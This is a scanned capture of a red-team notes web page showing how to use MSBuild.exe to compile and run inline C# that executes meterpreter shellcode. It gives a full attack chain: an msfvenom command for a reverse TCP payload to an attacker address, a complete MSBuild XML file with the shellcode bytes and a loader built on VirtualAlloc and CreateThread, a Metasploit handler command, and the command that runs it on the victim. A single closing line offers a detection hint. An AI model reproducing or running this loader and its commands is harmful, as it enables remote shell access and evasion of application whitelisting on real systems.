www.ired.team
Open in
urlscan Pro
104.18.1.81
Public Scan
Submitted URL: http://www.ired.team/offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c
Effective URL: https://www.ired.team/offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c
Submission: On August 01 via manual from US — Scanned from DE
Effective URL: https://www.ired.team/offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c
Submission: On August 01 via manual from US — Scanned from DE
Form analysis 0 forms found in the DOM
Text Content
RED TEAM NOTES
SearchCtrl + K
* What is ired.team notes?
* Pinned
* Pentesting Cheatsheets
* SQL Injection & XSS Playground
* Active Directory & Kerberos Abuse
* From Domain Admin to Enterprise Admin
* Kerberoasting
* Kerberos: Golden Tickets
* Kerberos: Silver Tickets
* AS-REP Roasting
* Kerberoasting: Requesting RC4 Encrypted TGS when AES is Enabled
* Kerberos Unconstrained Delegation
* Kerberos Constrained Delegation
* Kerberos Resource-based Constrained Delegation: Computer Object Takeover
* Domain Compromise via DC Print Server and Kerberos Delegation
* DCShadow - Becoming a Rogue Domain Controller
* DCSync: Dump Password Hashes from Domain Controller
* PowerView: Active Directory Enumeration
* Abusing Active Directory ACLs/ACEs
* Privileged Accounts and Token Privileges
* From DnsAdmins to SYSTEM to Domain Compromise
* Pass the Hash with Machine$ Accounts
* BloodHound with Kali Linux: 101
* Backdooring AdminSDHolder for Persistence
* Active Directory Enumeration with AD Module without RSAT or Admin
Privileges
* Enumerating AD Object Permissions with dsacls
* Active Directory Password Spraying
* Active Directory Lab with Hyper-V and PowerShell
* ADCS + PetitPotam NTLM Relay: Obtaining krbtgt Hash with Domain
Controller Machine Certificate
* From Misconfigured Certificate Template to Domain Admin
* Shadow Credentials
* Abusing Trust Account$: Accessing Resources on a Trusted Domain from a
Trusting Domain
* offensive security
* Red Team Infrastructure
* HTTP Forwarders / Relays
* SMTP Forwarders / Relays
* Phishing with Modlishka Reverse HTTP Proxy
* Automating Red Team Infrastructure with Terraform
* Cobalt Strike 101
* Powershell Empire 101
* Spiderfoot 101 with Kali using Docker
* Initial Access
* Password Spraying Outlook Web Access: Remote Shell
* Phishing with MS Office
* Phishing: XLM / Macro 4.0
* T1173: Phishing - DDE
* T1137: Phishing - Office Macros
* Phishing: OLE + LNK
* Phishing: Embedded Internet Explorer
* Phishing: .SLK Excel
* Phishing: Replacing Embedded Video with Bogus Payload
* Inject Macros from a Remote Dotm Template
* Bypassing Parent Child / Ancestry Detections
* Phishing: Embedded HTML Forms
* Phishing with GoPhish and DigitalOcean
* Forced Authentication
* NetNTLMv2 hash stealing using Outlook
* Code Execution
* regsvr32
* MSHTA
* Control Panel Item
* Executing Code as a Control Panel Item through an Exported Cplapplet
Function
* Code Execution through Control Panel Add-ins
* CMSTP
* InstallUtil
* Using MSBuild to Execute Shellcode in C#
* Forfiles Indirect Command Execution
* Application Whitelisting Bypass with WMIC and XSL
* Powershell Without Powershell.exe
* Powershell Constrained Language Mode Bypass
* Forcing Iexplore.exe to Load a Malicious DLL via COM Abuse
* pubprn.vbs Signed Script Code Execution
* Code & Process Injection
* CreateRemoteThread Shellcode Injection
* DLL Injection
* Reflective DLL Injection
* Shellcode Reflective DLL Injection
* Process Doppelganging
* Loading and Executing Shellcode From PE Resources
* Process Hollowing and Portable Executable Relocations
* APC Queue Code Injection
* Early Bird APC Queue Code Injection
* Shellcode Execution in a Local Process with QueueUserAPC and NtTestAlert
* Shellcode Execution through Fibers
* Shellcode Execution via CreateThreadpoolWait
* Local Shellcode Execution without Windows APIs
* Injecting to Remote Process via Thread Hijacking
* SetWindowHookEx Code Injection
* Finding Kernel32 Base and Function Addresses in Shellcode
* Executing Shellcode with Inline Assembly in C/C++
* Writing Custom Shellcode Encoders and Decoders
* Backdooring PE Files with Shellcode
* NtCreateSection + NtMapViewOfSection Code Injection
* AddressOfEntryPoint Code Injection without VirtualAllocEx RWX
* Module Stomping for Shellcode Injection
* PE Injection: Executing PEs inside Remote Processes
* API Monitoring and Hooking for Offensive Tooling
* Windows API Hooking
* Import Adress Table (IAT) Hooking
* DLL Injection via a Custom .NET Garbage Collector
* Writing and Compiling Shellcode in C
* Injecting .NET Assembly to an Unmanaged Process
* Binary Exploitation
* 32-bit Stack-based Buffer Overflow
* 64-bit Stack-based Buffer Overflow
* Return-to-libc / ret2libc
* ROP Chaining: Return Oriented Programming
* SEH Based Buffer Overflow
* Format String Bug
* Defense Evasion
* AV Bypass with Metasploit Templates and Custom Binaries
* Evading Windows Defender with 1 Byte Change
* Bypassing Windows Defender: One TCP Socket Away From Meterpreter and
Beacon Sessions
* Bypassing Cylance and other AVs/EDRs by Unhooking Windows APIs
* Windows API Hashing in Malware
* Detecting Hooked Syscalls
* Calling Syscalls Directly from Visual Studio to Bypass AVs/EDRs
* Retrieving ntdll Syscall Stubs from Disk at Run-time
* Full DLL Unhooking with C++
* Enumerating RWX Protected Memory Regions for Code Injection
* Disabling Windows Event Logs by Suspending EventLog Service Threads
* Obfuscated Powershell Invocations
* Masquerading Processes in Userland via _PEB
* Commandline Obfusaction
* File Smuggling with HTML and JavaScript
* Timestomping
* Alternate Data Streams
* Hidden Files
* Encode/Decode Data with Certutil
* Downloading Files with Certutil
* Packed Binaries
* Unloading Sysmon Driver
* Bypassing IDS Signatures with Simple Reverse Shells
* Preventing 3rd Party DLLs from Injecting into your Malware
* ProcessDynamicCodePolicy: Arbitrary Code Guard (ACG)
* Parent Process ID (PPID) Spoofing
* Executing C# Assemblies from Jscript and wscript with DotNetToJscript
* Enumeration and Discovery
* Windows Event IDs and Others for Situational Awareness
* Enumerating COM Objects and their Methods
* Enumerating Users without net, Services without sc and Scheduled Tasks
without schtasks
* Enumerating Windows Domains with rpcclient through SocksProxy ==
Bypassing Command Line Logging
* Dump Global Address List (GAL) from OWA
* Application Window Discovery
* Account Discovery & Enumeration
* Using COM to Enumerate Hostname, Username, Domain, Network Drives
* Detecting Sysmon on the Victim Host
* Privilege Escalation
* Primary Access Token Manipulation
* Windows NamedPipes 101 + Privilege Escalation
* DLL Hijacking
* WebShells
* Image File Execution Options Injection
* Unquoted Service Paths
* Pass The Hash: Privilege Escalation with Invoke-WMIExec
* Environment Variable $Path Interception
* Weak Service Permissions
* Credential Access & Dumping
* Dumping Credentials from Lsass Process Memory with Mimikatz
* Dumping Lsass Without Mimikatz
* Dumping Lsass without Mimikatz with MiniDumpWriteDump
* Dumping Hashes from SAM via Registry
* Dumping SAM via esentutl.exe
* Dumping LSA Secrets
* Dumping and Cracking mscash - Cached Domain Credentials
* Dumping Domain Controller Hashes Locally and Remotely
* Dumping Domain Controller Hashes via wmic and Vssadmin Shadow Copy
* Network vs Interactive Logons
* Reading DPAPI Encrypted Secrets with Mimikatz and C++
* Credentials in Registry
* Password Filter
* Forcing WDigest to Store Credentials in Plaintext
* Dumping Delegated Default Kerberos and NTLM Credentials w/o Touching
Lsass
* Intercepting Logon Credentials via Custom Security Support Provider and
Authentication Packages
* Pulling Web Application Passwords by Hooking HTML Input Fields
* Intercepting Logon Credentials by Hooking msv1_0!SpAcceptCredentials
* Credentials Collection via CredUIPromptForCredentials
* Lateral Movement
* WinRM for Lateral Movement
* WinRS for Lateral Movement
* WMI for Lateral Movement
* RDP Hijacking for Lateral Movement with tscon
* Shared Webroot
* Lateral Movement via DCOM
* WMI + MSI Lateral Movement
* Lateral Movement via Service Configuration Manager
* Lateral Movement via SMB Relaying
* WMI + NewScheduledTaskAction Lateral Movement
* WMI + PowerShell Desired State Configuration Lateral Movement
* Simple TCP Relaying with NetCat
* Empire Shells with NetNLTMv2 Relaying
* Lateral Movement with Psexec
* From Beacon to Interactive RDP Session
* SSH Tunnelling / Port Forwarding
* Lateral Movement via WMI Event Subscription
* Lateral Movement via DLL Hijacking
* Lateral Movement over headless RDP with SharpRDP
* Man-in-the-Browser via Chrome Extension
* ShadowMove: Lateral Movement by Duplicating Existing Sockets
* Persistence
* DLL Proxying for Persistence
* Schtask
* Service Execution
* Sticky Keys
* Create Account
* AddMonitor()
* NetSh Helper DLL
* Abusing Windows Managent Instrumentation
* WMI as a Data Storage
* Windows Logon Helper
* Hijacking Default File Extension
* Persisting in svchost.exe with a Service DLL
* Modifying .lnk Shortcuts
* Screensaver Hijack
* Application Shimming
* BITS Jobs
* COM Hijacking
* SIP & Trust Provider Hijacking
* Hijacking Time Providers
* Installing Root Certificate
* Powershell Profile Persistence
* RID Hijacking
* Word Library Add-Ins
* Office Templates
* Exfiltration
* Powershell Payload Delivery via DNS using Invoke-PowerCloud
* reversing, forensics & misc
* Internals
* Configuring Kernel Debugging Environment with kdnet and WinDBG Preview
* Compiling a Simple Kernel Driver, DbgPrint, DbgView
* Loading Windows Kernel Driver for Debugging
* Subscribing to Process Creation, Thread Creation and Image Load
Notifications from a Kernel Driver
* Listing Open Handles and Finding Kernel Object Addresses
* Sending Commands From Your Userland Program to Your Kernel Driver using
IOCTL
* Windows Kernel Drivers 101
* Windows x64 Calling Convention: Stack Frame
* Linux x64 Calling Convention: Stack Frame
* System Service Descriptor Table - SSDT
* Interrupt Descriptor Table - IDT
* Token Abuse for Privilege Escalation in Kernel
* Manipulating ActiveProcessLinks to Hide Processes in Userland
* ETW: Event Tracing for Windows 101
* Exploring Injected Threads
* Parsing PE File Headers with C++
* Instrumenting Windows APIs with Frida
* Exploring Process Environment Block
* Writing a Custom Bootloader
* Cloud
* AWS Accounts, Users, Groups, Roles, Policies
* Neo4j
* Dump Virtual Box Memory
* AES Encryption Using Crypto++ .lib in Visual Studio C++
* Reversing Password Checking Routine
Powered by GitBook
USING MSBUILD TO EXECUTE SHELLCODE IN C#
It's possible to use a native windows binary MSBuild.exe to compile and execute
inline C# code stored in an xml as discovered by Casey Smith.
EXECUTION
Generate meterpreter shellode in c#:
attacker@kali
Copy
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f csharp
Insert shellcode into the shellcode variable in linne 46:
bad.xml
Copy
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Runtime.InteropServices;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
public override bool Execute()
{
//replace with your own shellcode
byte[] shellcode = new byte[] { 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x0a,0x00,0x00,0x05,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
Spin up a handler in metasploit to catch your shell:
attacker@kali
Copy
msfconsole -x "use exploits/multi/handler; set lhost 10.0.0.5; set lport 443; set payload windows/meterpreter/reverse_tcp; exploit"
Build and execute malicious payload on the victim system using MSBuild:
attacker@victim
Copy
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\bad\bad.xml
OBSERVATION
Note that it's MSBuild.exe that will make the TCP connection to the attacker, so
as a defender, you should think about hunting for TCP connections initiated by
MSBuild.
REFERENCES
https://gist.github.com/ConsciousHacker/5fce0343f29085cd9fba466974e43f17
PreviousInstallUtilNextForfiles Indirect Command Execution
Last updated 5 years ago
On this page
* Execution
* Observation
* References
This site uses cookies to deliver its service and to analyse traffic. By
browsing this site, you accept the privacy policy.
AcceptReject